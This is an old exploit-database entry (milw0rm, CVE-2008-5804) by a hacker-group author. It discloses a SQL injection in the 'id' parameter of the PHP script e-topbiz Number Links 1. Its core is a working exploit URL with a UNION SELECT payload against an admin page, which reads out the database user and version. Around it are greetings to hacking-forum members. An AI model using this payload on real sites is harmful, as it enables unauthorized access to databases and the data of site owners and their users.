E-topbiz Number Links 1 - 'id' SQL Injection
Author: Hussin X
type: webapps
platform: php
port:
date_added: 2008-11-06
date_updated:
verified: 1
codes: OSVDB-49688;CVE-2008-5804
tags:
aliases:
screenshot_url:
application_url:
e-topbiz Number Links 1 php ( id ) Remote SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
MaiL : darkangeL_G85@Yahoo.CoM
___________________________________
script : http://e-topbiz.com/oprema/pages/numberlinks1.php
_____
ExploiT & Demo
______________
http://e-topbiz.com/trafficdemos/numberlinks1/admin/admin_catalog.php?action=edit&id=-2+union+select+concat(user
(),0x3e,version()),2,3,4,5--
____________________________( Greetz )_________________________________
|
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
|
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
|_____________________________________________________________________
Im IRAQi | Im TrYaGi
# milw0rm.com [2008-11-07]